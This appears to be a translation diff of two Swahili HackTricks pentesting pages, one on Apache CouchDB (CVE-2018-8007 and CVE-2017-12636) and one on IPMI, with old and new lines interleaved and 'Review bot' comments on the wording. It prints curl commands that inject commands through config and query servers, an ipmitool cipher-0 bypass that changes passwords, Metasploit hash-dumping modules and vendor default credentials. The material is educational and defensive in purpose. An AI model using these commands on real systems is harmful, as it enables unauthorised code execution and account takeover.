Ugunduzi wa hivi karibuni wa udhaifu, CVE-2018-8007, unaathiri Apache CouchDB na ulichunguzwa, ukiweka wazi kuwa kutumia udhaifu huu kunahitaji ruhusa ya kuandika kwenye faili ya `local.ini`. Ingawa haifai moja kwa moja kwa mfumo wa lengo la awali kutokana na vizuizi vya usalama, marekebisho yalifanywa ili kutoa ruhusa ya kuandika kwenye faili ya `local.ini` kwa madhumuni ya uchunguzi. Hatua za kina na mifano ya nambari zinatolewa hapa chini, zikionyesha mchakato huo.
Uthibitisho wa hivi karibuni wa udhaifu, CVE-2018-8007, unaoathiri Apache CouchDB ulifanyiwa uchambuzi, ukionyesha kwamba matumizi yanahitaji ruhusa za kuandika kwenye faili `local.ini`. Ingawa si moja kwa moja inatumika kwa mfumo wa lengo wa awali kutokana na vizuizi vya usalama, marekebisho yalifanywa ili kutoa ufikiaji wa kuandika kwenye faili `local.ini` kwa ajili ya madhumuni ya uchunguzi. Hatua za kina na mifano ya msimbo zinatolewa hapa chini, zikionyesha mchakato.
Kwanza, mazingira yanatayarishwa kwa kuhakikisha kuwa faili ya `local.ini` inaweza kuandikwa, ikathibitishwa kwa kuorodhesha ruhusa:
Kwanza, mazingira yanaandaliwa kwa kuhakikisha faili `local.ini` inaweza kuandikwa, ikithibitishwa kwa kuorodhesha ruhusa:
```bash
root@canape:/home/homer/etc# ls -l
-r--r--r-- 1 homer homer 18477 Jan 20 2018 default.ini
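Review bot: the new heading `### **Kutatua CVE-2018-8007 kupitia Marekebisho ya local.ini**` inverts the meaning of the section: "kutatua" means to solve or resolve, while the section (and the old line `### **Kutumia CVE-2018-8007 kwa Kurekebisha local.ini**`) is about exploiting the CVE by modifying local.ini; keep "Kutumia" (or "Kutumia udhaifu wa CVE-2018-8007"). In the same hunk, "cookie" is now rendered as "keki" in the heading "Muhtasari wa Usalama wa Keki ya Erlang" and in "kitambulisho cha kipekee kinachojulikana kama 'keki'"; that is the word for cake and it no longer matches the `#erlang-cookie-rce` anchor the paragraph links to, so keep the technical term "cookie" (or "Erlang cookie") as the old line did. Also `[**Taarifa zaidi kuhusu hii vuln hapa**]` drops into slang where the sentence two lines above uses "udhaifu"; "udhaifu huu" keeps the terminology consistent.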
@ -156,11 +157,11 @@ root@canape:/home/homer/etc# ls -l
-r--r--r-- 1 root root 4841 Sep 14 14:30 local.ini.bk
-r--r--r-- 1 homer homer 1345 Jan 14 2018 vm.args
```
Kuendeleza udhaifu huu, amri ya curl inatekelezwa, ikilenga usanidi wa `cors/origins` katika `local.ini`. Hii inaingiza chanzo kipya pamoja na amri za ziada chini ya sehemu ya `[os_daemons]`, lengo likiwa ni kutekeleza nambari ya aina yoyote:
Ili kutumia udhaifu huo, amri ya curl inatekelezwa, ikilenga usanidi wa `cors/origins` katika `local.ini`. Hii inaingiza asili mpya pamoja na amri za ziada chini ya sehemu ya `[os_daemons]`, ikilenga kutekeleza msimbo wa kiholela:
```bash
www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/cors/origins' -H "Accept: application/json" -H "Content-Type: application/json" -d "0xdf\n\n[os_daemons]\ntestdaemon = /usr/bin/touch /tmp/0xdf"
```
Uthibitisho unaofuata unaonyesha usanidi ulioingizwa katika `local.ini`, ukilinganisha na nakala rudufu ili kuonyesha mabadiliko:
Uthibitisho wa baadaye unaonyesha usanidi ulioingizwa katika `local.ini`, ukilinganisha na nakala ya akiba ili kuonyesha mabadiliko:
```bash
root@canape:/home/homer/etc# diff local.ini local.ini.bk
119,124d118
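Review bot: the injected daemon name differs between the command and its verification: the curl body in this hunk registers `testdaemon = /usr/bin/touch /tmp/0xdf`, but the `diff local.ini local.ini.bk` output in the next hunk shows `< test_daemon = /usr/bin/touch /tmp/0xdf`. Both are unchanged context, but since this pass already touches the surrounding prose, aligning the two names (to whichever the cited 0xdf write-up actually used) would stop readers wondering whether a second entry was written.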
@ -169,77 +170,78 @@ root@canape:/home/homer/etc# diff local.ini local.ini.bk
< [os_daemons]
< test_daemon = /usr/bin/touch /tmp/0xdf
```
Kwa sasa, faili inayotarajiwa (`/tmp/0xdf`) haipo, ikionyesha kuwa amri iliyochomwa haijaendeshwa bado. Uchunguzi zaidi unaonyesha kuwa kuna michakato inayohusiana na CouchDB inayoendelea, ikiwa ni pamoja na moja ambayo inaweza kutekeleza amri iliyochomwa:
Awali, faili inatarajiwa (`/tmp/0xdf`) halipo, ikionyesha kwamba amri iliyowekwa haijatekelezwa bado. Uchunguzi zaidi unaonyesha kwamba michakato inayohusiana na CouchDB inafanya kazi, ikiwa ni pamoja na moja ambayo inaweza kutekeleza amri iliyowekwa:
```bash
root@canape:/home/homer/bin# ps aux | grep couch
```
Kwa kumaliza mchakato wa CouchDB uliothibitishwa na kuruhusu mfumo kuizindua tena kiotomatiki, utekelezaji wa amri iliyowekwa ndani unaanzishwa, kama inavyothibitishwa na uwepo wa faili iliyokosekana awali:
Kwa kumaliza mchakato wa CouchDB ulioainishwa na kuruhusu mfumo kuanzisha upya kiotomatiki, utekelezaji wa amri iliyowekwa unachochewa, kuthibitishwa na uwepo wa faili iliyokosekana hapo awali:
```bash
root@canape:/home/homer/etc# kill 711
root@canape:/home/homer/etc# ls /tmp/0xdf
/tmp/0xdf
```
Uchunguzi huu unathibitisha uwezekano wa kufaidika na CVE-2018-8007 chini ya hali maalum, hasa hitaji la kupata ufikiaji wa kuandika kwenye faili ya `local.ini`. Mifano ya nambari iliyotolewa na hatua za utaratibu zinatoa mwongozo wazi wa kuiga shambulio katika mazingira yaliyodhibitiwa.
Hii uchunguzi inathibitisha uwezekano wa unyakuzi wa CVE-2018-8007 chini ya hali maalum, hasa hitaji la ufikiaji wa kuandika kwenye faili `local.ini`. Mifano ya msimbo iliyotolewa na hatua za utaratibu zinatoa mwongozo wazi wa kuiga unyakuzi katika mazingira yaliyodhibitiwa.
Kwa maelezo zaidi kuhusu CVE-2018-8007, angalia taarifa ya mdsec: [CVE-2018-8007](https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/).
Kwa maelezo zaidi kuhusu CVE-2018-8007, rejelea taarifa kutoka mdsec: [CVE-2018-8007](https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/).
### **Uchunguzi wa CVE-2017-12636 na Ruhusa ya Kuandika kwenye local.ini**
### **Kuchunguza CVE-2017-12636 na Ruhusa za Kuandika kwenye local.ini**
Mfano [kutoka hapa](https://0xdf.gitlab.io/2018/09/15/htb-canape.html).
Udhaifu unaojulikana kama CVE-2017-12636 ulichunguzwa, ambao unawezesha utekelezaji wa nambari kupitia mchakato wa CouchDB, ingawa mipangilio maalum inaweza kuzuia utumiaji wake. Licha ya marejeleo mengi ya Proof of Concept (POC) yanayopatikana mtandaoni, marekebisho yanahitajika ili kutumia udhaifu huo kwenye toleo la CouchDB 2, tofauti na toleo la kawaida linalolengwa la 1.x. Hatua za awali zinahusisha kuthibitisha toleo la CouchDB na kuhakikisha kutokuwepo kwa njia ya seva ya maswali inayotarajiwa.
Uthibitisho wa udhaifu unaojulikana kama CVE-2017-12636 ulifanyiwa uchunguzi, ambao unaruhusu utekelezaji wa msimbo kupitia mchakato wa CouchDB, ingawa usanidi maalum unaweza kuzuia unyakuzi wake. Licha ya marejeleo mengi ya Ushahidi wa Dhana (POC) yanayopatikana mtandaoni, marekebisho yanahitajika ili kuweza kutumia udhaifu kwenye toleo la CouchDB 2, tofauti na toleo linalolengwa mara nyingi 1.x. Hatua za awali zinajumuisha kuthibitisha toleo la CouchDB na kuthibitisha kutokuwepo kwa njia ya seva za uchunguzi zinazotarajiwa:
```bash
curl http://localhost:5984
curl http://0xdf:df@localhost:5984/_config/query_servers/
```
Kuwezesha CouchDB toleo 2.0, njia mpya hutumiwa:
Ili kuendana na toleo la CouchDB 2.0, njia mpya inatumika:
```bash
curl 'http://0xdf:df@localhost:5984/_membership'
curl http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers
```
Majaribio ya kuongeza na kutekeleza seva mpya ya maswali yalikumbana na makosa yanayohusiana na ruhusa, kama ilivyodhihirishwa na matokeo yafuatayo:
Majaribio ya kuongeza na kuitisha seva mpya ya uchunguzi yalikutana na makosa yanayohusiana na ruhusa, kama inavyoonyeshwa na matokeo yafuatayo:
```bash
curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"'
```
Uchunguzi zaidi ulifunua matatizo ya ruhusa na faili ya `local.ini`, ambayo haikuweza kuandikwa. Kwa kubadilisha ruhusa za faili kwa kutumia upatikanaji wa mizizi au homer, ilikuwa inawezekana kuendelea:
Uchunguzi zaidi ulibaini matatizo ya ruhusa na faili ya `local.ini`, ambayo haikuweza kuandikwa. Kwa kubadilisha ruhusa za faili kwa kutumia root au ufikiaji wa homer, ilikua inawezekana kuendelea:
```bash
cp /home/homer/etc/local.ini /home/homer/etc/local.ini.b
chmod 666 /home/homer/etc/local.ini
```
Majaribio ya baadaye ya kuongeza seva ya utafutaji yalifanikiwa, kama inavyothibitishwa na kutokuwepo kwa ujumbe wa kosa katika majibu. Kubadilisha faili ya `local.ini` kwa mafanikio kulithibitishwa kupitia kulinganisha faili:
Majaribio ya baadaye ya kuongeza seva ya uchunguzi yalifanikiwa, kama inavyoonyeshwa na ukosefu wa ujumbe wa makosa katika jibu. Marekebisho ya mafanikio ya faili ya `local.ini` yalithibitishwa kupitia kulinganisha faili:
```bash
curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"'
```
Mchakato uliendelea na uundaji wa kisanduku cha habari na hati, ukifuatiwa na jaribio la kutekeleza nambari kupitia ramani ya maoni ya desturi inayolingana na seva ya utafutaji iliyopewa hivi karibuni:
Mchakato uliendelea na uundaji wa hifadhidata na hati, ukifuatwa na jaribio la kutekeleza msimbo kupitia ramani ya mtazamo maalum kwa seva ya uchunguzi iliyoongezwa hivi karibuni:
```bash
curl -X PUT 'http://0xdf:df@localhost:5984/df'
curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d '{"_id": "HTP"}'
curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}'
```
**[Muhtasari](https://github.com/carlospolop/hacktricks/pull/116/commits/e505cc2b557610ef5cce09df6a14b10caf8f75a0)** na mzigo mbadala hutoa ufahamu zaidi juu ya kutumia CVE-2017-12636 chini ya hali maalum. **Rasilimali muhimu** za kutumia udhaifu huu ni pamoja na:
A **[muhtasari](https://github.com/carlospolop/hacktricks/pull/116/commits/e505cc2b557610ef5cce09df6a14b10caf8f75a0)** wenye payload mbadala unatoa ufahamu zaidi kuhusu kutumia CVE-2017-12636 chini ya hali maalum. **Rasilimali muhimu** za kutumia udhaifu huu ni pamoja na:
- [Nambari ya POC ya kudukua](https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py)
- [Ingizo la Exploit Database](https://www.exploit-db.com/exploits/44913/)
- [Msimbo wa POC exploit](https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py)
- [Kichwa cha Taarifa ya Exploit Database](https://www.exploit-db.com/exploits/44913/)
## Shodan
* `port:5984 couchdb`
## Marejeo
## Marejeleo
* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
* [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
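Review bot: "query server" is mistranslated in the new lines of this hunk as "seva ya uchunguzi" (a server for investigation), for example in `Majaribio ya kuongeza na kuitisha seva mpya ya uchunguzi yalikutana na makosa`, while the old line used "seva ya maswali" and the commands themselves target `_config/query_servers`; keep "query server" untranslated or restore the old rendering so the prose matches the config key. Related wording: "exploit" is rendered as "unyakuzi" in "Hii uchunguzi inathibitisha uwezekano wa unyakuzi wa CVE-2018-8007" (and "Hii uchunguzi" should agree as "Uchunguzi huu") but as "kutumia" in the CVE-2017-12636 paragraph and the resource list, and "A **[muhtasari](...)** wenye payload mbadala" keeps the English article "A"; pick one verb and drop the article. Finally, the new footer lines starting `* Check the [**subscription plans**]` are left in English here, whereas the same footer in the IPMI file below is translated ("Angalia [**mpango wa usajili**]"); the two files should ship the same footer.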

View file

@ -2,111 +2,112 @@
## 623/UDP/TCP - IPMI
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
### **Muhtasari wa IPMI**
### **Overview of IPMI**
**[Intelligent Platform Management Interface (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** inatoa njia iliyostandardizwa ya usimamizi na ufuatiliaji wa mbali wa mifumo ya kompyuta, bila kujali mfumo wa uendeshaji au hali ya umeme. Teknolojia hii inaruhusu wasimamizi wa mfumo kusimamia mifumo kwa mbali, hata wakati zimezimwa au hazijibu, na ni muhimu hasa kwa:
**[Intelligent Platform Management Interface (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** inatoa njia iliyoimarishwa ya usimamizi wa mbali na ufuatiliaji wa mifumo ya kompyuta, bila kujali mfumo wa uendeshaji au hali ya nguvu. Teknolojia hii inawawezesha wasimamizi wa mifumo kusimamia mifumo kwa mbali, hata wakati zimezimwa au hazijajibu, na ni muhimu hasa kwa:
- Mipangilio ya awali ya kuanza mfumo
- Mipangilio ya awali ya OS
- Usimamizi wa kuzima nguvu
- Kurejesha kutoka kwa kushindwa kwa mfumo
- Kupona kutoka kwa kushindwa kwa mfumo
IPMI inaweza kufuatilia joto, voltage, kasi ya kifaa cha kupoza hewa, na ugavi wa umeme, pamoja na kutoa habari ya hesabu, kukagua magogo ya vifaa, na kutuma tahadhari kupitia SNMP. Kwa uendeshaji wake, inahitajika chanzo cha umeme na uhusiano wa LAN.
IPMI ina uwezo wa kufuatilia joto, voltages, kasi za mashabiki, na vyanzo vya nguvu, pamoja na kutoa taarifa za hesabu, kupitia kumbukumbu za vifaa, na kutuma arifa kupitia SNMP. Muhimu kwa uendeshaji wake ni chanzo cha nguvu na muunganisho wa LAN.
Tangu kuanzishwa kwake na Intel mnamo 1998, IPMI imeungwa mkono na wauzaji wengi, ikiboresha uwezo wa usimamizi wa mbali, haswa na msaada wa toleo la 2.0 kwa serial juu ya LAN. Sehemu muhimu ni pamoja na:
Tangu ilipoanzishwa na Intel mwaka 1998, IPMI imeungwa mkono na wauzaji wengi, ikiongeza uwezo wa usimamizi wa mbali, hasa na msaada wa toleo la 2.0 kwa serial juu ya LAN. Vipengele muhimu ni pamoja na:
- **Baseboard Management Controller (BMC):** Kichapishi kikuu cha IPMI kwa shughuli.
- **Mabasi na Viunganishi vya Mawasiliano:** Kwa mawasiliano ya ndani na nje, ikiwa ni pamoja na ICMB, IPMB, na viunganishi mbalimbali kwa uhusiano wa ndani na wa mtandao.
- **IPMI Memory:** Kwa kuhifadhi magogo na data.
- **Baseboard Management Controller (BMC):** Kichakataji kikuu cha IPMI.
- **Communication Buses and Interfaces:** Kwa mawasiliano ya ndani na nje, ikiwa ni pamoja na ICMB, IPMB, na interfaces mbalimbali za muunganisho wa ndani na mtandao.
- **IPMI Memory:** Kwa kuhifadhi kumbukumbu na data.
![https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right](https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right)
**Bandari ya Default**: 623/UDP/TCP (Kawaida inatumia UDP lakini inaweza pia kuendesha kwenye TCP)
**Default Port**: 623/UDP/TCP (Kawaida iko kwenye UDP lakini inaweza pia kuwa inafanya kazi kwenye TCP)
## Uchunguzi
## Enumeration
### Ugunduzi
### Discovery
```bash
nmap -n -p 623 10.0.0./24
nmap -n-sU -p 623 10.0.0./24
use auxiliary/scanner/ipmi/ipmi_version
```
Unaweza **kutambua** **toleo** kwa kutumia:
Unaweza **kubaini** **toleo** ukitumia:
```bash
use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10
```
### Mipasuko ya Usalama ya IPMI
### IPMI Vulnerabilities
Katika uwanja wa IPMI 2.0, kasoro kubwa ya usalama iligunduliwa na Dan Farmer, ikifichua kasoro kupitia **aina ya kificho 0**. Kasoro hii, iliyodhibitishwa kwa undani katika [utafiti wa Dan Farmer](http://fish2.com/ipmi/cipherzero.html), inawezesha ufikiaji usiohalali na nenosiri lolote linalotolewa ikiwa mtumiaji halali analengwa. Udhaifu huu uligunduliwa katika BMC mbalimbali kutoka kwa watengenezaji kama vile HP, Dell, na Supermicro, ikionyesha tatizo kubwa katika utekelezaji wa IPMI 2.0.
Katika eneo la IPMI 2.0, kasoro kubwa ya usalama iligunduliwa na Dan Farmer, ikifunua udhaifu kupitia **cipher type 0**. Udhaifu huu, ulioandikwa kwa undani katika [utafiti wa Dan Farmer](http://fish2.com/ipmi/cipherzero.html), unaruhusu ufikiaji usioidhinishwa kwa kutumia nenosiri lolote ikiwa mtumiaji halali anashambuliwa. Udhaifu huu ulipatikana katika BMC mbalimbali kutoka kwa watengenezaji kama HP, Dell, na Supermicro, ukionyesha tatizo lililoenea katika utekelezaji wote wa IPMI 2.0.
### **Kupitisha Uthibitishaji wa IPMI kupitia Kificho 0**
### **IPMI Authentication Bypass via Cipher 0**
Ili kugundua kasoro hii, skana ya ziada ya Metasploit ifuatayo inaweza kutumika:
```bash
use auxiliary/scanner/ipmi/ipmi_cipher_zero
```
Udanganyifu wa kasoro hii unaweza kufanikishwa kwa kutumia `ipmitool`, kama inavyoonyeshwa hapa chini, kuruhusu orodha na marekebisho ya nywila za mtumiaji:
Utekelezaji wa kasoro hii unaweza kufanywa kwa kutumia `ipmitool`, kama inavyoonyeshwa hapa chini, ikiruhusu orodha na mabadiliko ya nywila za watumiaji:
```bash
apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password
```
### **IPMI 2.0 RAKP Uthibitisho wa Mbali wa Kupata Hash ya Nenosiri la Mbali**
### **IPMI 2.0 RAKP Uthibitisho wa Ujumbe wa Mbali wa Nywila ya Hash**
Udhaifu huu unawezesha kupata nywila zilizohifadhiwa kwa chumvi (MD5 na SHA1) kwa jina lolote la mtumiaji lililopo. Ili kujaribu udhaifu huu, Metasploit inatoa moduli:
Ushirikiano huu unaruhusu upatikanaji wa nywila za hash zilizotiwa chumvi (MD5 na SHA1) kwa jina lolote lililopo. Ili kujaribu ushirikiano huu, Metasploit inatoa moduli:
```bash
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
```
### **Uthibitishaji wa IPMI Usio na Kitambulisho**
### **IPMI Anonymous Authentication**
Usanidi wa chaguo-msingi katika BMC nyingi huruhusu ufikiaji "usio na kitambulisho", ambao unajulikana kwa kutokuwepo kwa majina ya mtumiaji na nywila. Usanidi huu unaweza kutumiwa kudukua upya nywila za akaunti za watumiaji walio na majina kwa kutumia `ipmitool`:
Mkonfigu wa kawaida katika BMC nyingi unaruhusu ufikiaji wa "anonymous", unaojulikana kwa nywila na jina la mtumiaji zisizo na thamani. Mkonfigu huu unaweza kutumiwa kubadilisha nywila za akaunti za watumiaji waliopewa jina kwa kutumia `ipmitool`:
```bash
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword
```
### **Nenosiri za Wazi za Supermicro IPMI**
### **Supermicro IPMI Clear-text Passwords**
Chaguo muhimu katika IPMI 2.0 inahitaji uhifadhi wa nywila za wazi ndani ya BMCs kwa madhumuni ya uwakilishi. Uhifadhi wa Supermicro wa nywila hizi katika maeneo kama vile `/nv/PSBlock` au `/nv/PSStore` unaleta wasiwasi mkubwa wa usalama:
Chaguo muhimu katika muundo wa IPMI 2.0 kinahitaji uhifadhi wa nywila za wazi ndani ya BMCs kwa madhumuni ya uthibitishaji. Uhifadhi wa nywila hizi na Supermicro katika maeneo kama `/nv/PSBlock` au `/nv/PSStore` kunaibua wasiwasi mkubwa wa usalama:
```bash
cat /nv/PSBlock
```
### **Supermicro IPMI UPnP Vulnerability**
### **Supermicro IPMI UPnP Uthibitisho wa Usalama**
Kujumuishwa kwa msikilizaji wa UPnP SSDP katika firmware ya IPMI ya Supermicro, haswa kwenye bandari ya UDP 1900, inaleta hatari kubwa ya usalama. Udhaifu katika Intel SDK kwa vifaa vya UPnP toleo 1.3.1, kama ilivyoelezwa na [ufichuzi wa Rapid7](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play), inaruhusu ufikiaji wa mizizi kwa BMC:
Kuongezwa kwa msikilizaji wa UPnP SSDP katika firmware ya IPMI ya Supermicro, hasa kwenye bandari ya UDP 1900, kunaingiza hatari kubwa ya usalama. Uthibitisho katika Intel SDK kwa ajili ya vifaa vya UPnP toleo 1.3.1, kama ilivyoelezwa na [kufichuliwa kwa Rapid7](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play), kunawezesha ufikiaji wa mizizi kwa BMC:
```bash
msf> use exploit/multi/upnp/libupnp_ssdp_overflow
```
### Brute Force
**HP inarandarandisha nenosiri la msingi** kwa bidhaa yake ya **Integrated Lights Out (iLO)** wakati wa utengenezaji. Mazoea haya yanatofautiana na wazalishaji wengine, ambao kwa kawaida hutumia **vitambulisho vya msingi vya tuli**. Muhtasari wa majina ya mtumiaji na nywila za msingi kwa bidhaa mbalimbali ni kama ifuatavyo:
**HP inabadilisha nenosiri la default** kwa bidhaa yake ya **Integrated Lights Out (iLO)** wakati wa utengenezaji. Praktika hii inatofautiana na wazalishaji wengine, ambao mara nyingi hutumia **akili za default zisizobadilika**. Muhtasari wa majina ya watumiaji na nenosiri za default kwa bidhaa mbalimbali unapatikana kama ifuatavyo:
- **HP Integrated Lights Out (iLO)** hutumia **herufi ndefu ya wahusika 8 iliyorandarandishwa kiwandani** kama nywila yake ya msingi, ikionyesha kiwango cha juu cha usalama.
- Bidhaa kama **Dell's iDRAC, IBM's IMM**, na **Fujitsu's Integrated Remote Management Controller** hutumia nywila rahisi za kudhani kama "calvin", "PASSW0RD" (na sifuri), na "admin" mtawalia.
- Vivyo hivyo, **Supermicro IPMI (2.0), Oracle/Sun ILOM**, na **ASUS iKVM BMC** pia hutumia vitambulisho vya msingi rahisi, na "ADMIN", "changeme", na "admin" kama nywila zao.
- **HP Integrated Lights Out (iLO)** inatumia **mfuatano wa herufi 8 ulioandaliwa kiwandani** kama nenosiri lake la default, ikionyesha kiwango cha juu cha usalama.
- Bidhaa kama **iDRAC ya Dell, IMM ya IBM**, na **Meneja wa Usimamizi wa Kijijini wa Fujitsu** zinatumia nenosiri rahisi kubashiri kama "calvin", "PASSW0RD" (ikiwa na sifuri), na "admin" mtawalia.
- Vivyo hivyo, **Supermicro IPMI (2.0), Oracle/Sun ILOM**, na **ASUS iKVM BMC** pia zinatumia akili rahisi za default, ambapo "ADMIN", "changeme", na "admin" zinatumika kama nenosiri zao.
## Kupata Mwenyeji kupitia BMC
## Accessing the Host via BMC
Upatikanaji wa kiutawala kwa Baseboard Management Controller (BMC) hufungua njia mbalimbali za kupata mfumo wa uendeshaji wa mwenyeji. Njia rahisi ni kuchexploitisha utendaji wa Keyboard, Video, Mouse (KVM) wa BMC. Hii inaweza kufanywa kwa kuzima upya mwenyeji hadi kwenye kabati la mizizi kupitia GRUB (kwa kutumia `init=/bin/sh`) au kwa kuanza kutoka kwenye CD-ROM ya kisasa iliyowekwa kama diski ya uokoaji. Njia kama hizo zinaruhusu kuingiza mlango nyuma, kuchota data, au kufanya hatua zozote zinazohitajika kwa tathmini ya usalama. Hata hivyo, hii inahitaji kuzima upya mwenyeji, ambayo ni kikwazo kikubwa. Bila kuzima upya, kupata mwenyeji unaoendelea ni ngumu zaidi na inatofautiana na usanidi wa mwenyeji. Ikiwa konsoli ya kimwili au ya serial ya mwenyeji inabaki imeingia, inaweza kuchukuliwa kwa urahisi kupitia KVM ya BMC au utendaji wa serial-over-LAN (sol) kupitia `ipmitool`. Uchunguzi wa utumiaji wa rasilimali za vifaa zilizoshirikiwa, kama vile basi la i2c na chip ya Super I/O, ni eneo ambalo linahitaji uchunguzi zaidi.
